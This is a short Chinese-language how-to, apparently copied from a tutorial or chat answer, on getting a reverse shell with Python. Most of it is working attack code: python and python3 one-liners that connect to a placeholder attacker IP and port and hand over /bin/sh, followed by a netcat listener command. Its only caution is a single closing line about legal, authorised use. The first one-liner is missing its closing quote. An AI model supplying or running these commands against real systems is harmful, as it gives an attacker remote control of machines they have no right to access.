使用 Python 实现反弹 shell
如果目标系统有 Python 环境,可以使用以下 Python 命令反弹 shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的IP地址",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
如果目标系统安装了 Python3,也可以使用以下方式:
`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的IP地址",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
监听端准备
在你的机器上,可以使用 nc
监听指定的端口,等待反弹的 shell 连接:
bash
复制代码
nc -lvnp 端口号
通过这种方式,你可以获得远程系统的 shell 控制。注意:请在合法且授权的场景中使用这些命令。